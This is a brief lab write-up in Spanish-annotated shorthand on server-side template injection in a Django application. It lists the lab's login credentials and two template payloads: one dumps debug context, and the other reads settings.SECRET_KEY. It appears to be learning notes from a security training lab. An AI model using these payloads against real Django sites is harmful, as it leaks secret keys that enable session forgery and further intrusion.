Lab: Server-side template injection with information disclosure via user-supplied objects
c
content-manager : C0nt3ntM4n4g3r
c
{% debug %}
Teniendo en cuenta, que en Django existe SECRET_KEY por lo que podemos llamar a un
c
'{{ settings.SECRET_KEY }}'